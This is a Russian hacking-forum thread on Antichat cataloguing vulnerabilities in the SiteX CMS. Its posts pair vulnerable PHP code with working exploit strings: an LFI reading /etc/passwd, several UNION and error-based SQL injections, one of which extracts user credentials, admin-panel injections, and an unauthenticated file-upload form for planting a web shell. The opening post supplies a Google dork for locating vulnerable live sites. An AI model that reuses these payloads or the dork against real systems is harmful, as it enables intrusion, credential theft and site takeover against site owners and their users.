ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обзор Уязвимостей SiteX
  #1  
Старый 15.04.2009, 12:56
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Обзор Уязвимостей SiteX

Уязвимости SiteX 0.7 Beta

download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip

dork: "Powered by SiteX 0.7 Beta"
(выдачу гугла больше 10 линков не ставьте )

1) [LFI] (требования: magic_quotes=off, register_globals=on)

/themes/Corporate/homepage.php
уязвимый код:
PHP код:
include("themes/$THEME_FOLDER/header.php"); 
эксплуатирование:
Код:
/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00

2) [SQL-injection] (требования: magic_quotes=off, register_globals=on)

links.php
уязвимый код:
PHP код:
if($category)
    {
        
$query "SELECT * FROM $DB_Links_Groups WHERE id='$category'";
        
$result mysql_query($query$Link) or queryError("8"mysql_error()); 
эксплуатирование:
Код:
/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+

P.S:
шелл в админке аплоадится без проблем

Последний раз редактировалось Iceangel_; 15.04.2009 в 13:23..
 
Ответить с цитированием

  #2  
Старый 15.04.2009, 13:44
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
1) [LFI] требования: magic_quotes=off
не обязательно
 
Ответить с цитированием

  #3  
Старый 15.04.2009, 13:54
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 geezer.code
не на всех сайтах получается реализовать, поэтому как требование поставил =)
 
Ответить с цитированием

  #4  
Старый 25.02.2010, 18:26
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

Уязвимости SiteX 0.7 Beta

Product : SiteX 0.7.4 build 405
PHPinfo
Код:
http://localhost/setup/phpinfo.php
LFI
PHP код:
include("themes/$THEME_FOLDER/header.php"); 
magic_quotes=off
register_globals=on

results :
Код:
http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00
SQL Injection
magic_quotes=off, register_globals=on
photo.php
PHP код:
$query "SELECT * FROM $DB_Photos WHERE id='$photoid'";
$result mysql_query($query$Link) or queryError("11"mysql_error());
$sxPhoto mysql_fetch_object($result);

$sxNewViews $sxPhoto->views 1;

$sxQuery2 "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'";
$sxResult2 mysql_query($sxQuery2$Link) or queryError("10"mysql_error());

$queryA "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'";
$resultA mysql_query($queryA$Link) or queryError("12"mysql_error());
$ROWA mysql_fetch_object($resultA); 
result :
Код:
http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
SQL injection in Admin Panel
magic_quotes=off, register_globals=on
admin/page_edit.php
PHP код:
$result mysql_query($query$Link) or queryError("38"mysql_error());
    
    
$query "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'";
    
$result mysql_query($query$Link) or queryError("38"mysql_error());
    
    if(
$private)
    {
        foreach (
$user_types as $k => $v)
        {
            
$query "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')";
            
$result mysql_query($query$Link) or queryError("38"mysql_error());
        }
    }

    
header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited']));
    die();
}

$query "SELECT * FROM $DB_Pages WHERE id='$pageid'"
result :
Код:
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+
admin/journal_edit.php
PHP код:
$query "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'";
    
$result mysql_query($query$Link) or queryError("21"mysql_error());
    
    
writeRSSXML();
    
    
header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited']));
    die();
    
//$message = $sxLang['MessageJournalEdited'];
}

$query "SELECT * FROM $DB_Journal WHERE id='$entryid'";
$result mysql_query($query$Link) or queryError("21"mysql_error());
$ROW mysql_fetch_object($result); 
result :
Код:
http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+

Последний раз редактировалось [x60]unu; 25.02.2010 в 18:45..
 
Ответить с цитированием

  #5  
Старый 25.02.2010, 22:11
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

5 копеек..)

-------

1) SQL injection(требования: mq=off, любой акк)

file:/admin/profile_view.php

PHP код:
        $query2 "SELECT * FROM $DB_Users$DB_Users_Assoc$DB_Users_Types
                  WHERE 
$DB_Users.username='$user' AND
                        
$DB_Users.id=$DB_Users_Assoc.userid AND
                        
$DB_Users_Assoc.typeid=$DB_Users_Types.id";
        
$result2 mysql_query($query2$Link) or queryError("402"mysql_error()); 
result:

Код:
/admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

2)blind SQL injection(требования: mq=off,желательно 5 ветка бд)

file: /forums_topic.php

PHP код:
$query "SELECT * FROM $DB_Forums_Posts WHERE id='$topicid'";
$result mysql_query($query$Link) or queryError("71"mysql_error()); 
result:

Код:
/forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+
//много скуль..

Последний раз редактировалось .:[melkiy]:.; 25.02.2010 в 22:53..
 
Ответить с цитированием

  #6  
Старый 26.03.2010, 05:23
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Внесу свой посильный вклад.

[Version 0.8.0 RC 3 build 524]

Заливка шела. Не требуеться ни прав, ни авторизации, ни чего то еще.

File: includes/uploadify/uploadify.php

PHP код:
if (!empty($_FILES)) {
    
$tempFile $_FILES['Filedata']['tmp_name'];
    
$targetPath $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    
$targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    
    
// $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    // $fileTypes  = str_replace(';','|',$fileTypes);
    // $typesArray = split('\|',$fileTypes);
    // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    
    // if (in_array($fileParts['extension'],$typesArray)) {
        // Uncomment the following line if you want to make the directory if it doesn't exist
        // mkdir(str_replace('//','/',$targetPath), 0755, true);
        
        
move_uploaded_file($tempFile,$targetFile);
        echo 
"1";
    
// } else {
    //     echo 'Invalid file type.';
    // }

Target:
Exploit ^_^
Код:
<form  enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="folder" />
</form>
Если же, начальник сайта, раскомментирует по дефолту закомментированые строчки, то допустимые расширения для файлов,можно будет передать в параметре fileext, записав туда .php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Сценарии/CMF/СMS 184 15.06.2010 11:10
[ Обзор уязвимостей RunCMS ] Solide Snake Сценарии/CMF/СMS 37 13.05.2010 18:21
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
[ Обзор уязвимостей #osCommerce# ] life_is_shit Сценарии/CMF/СMS 9 10.11.2009 17:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ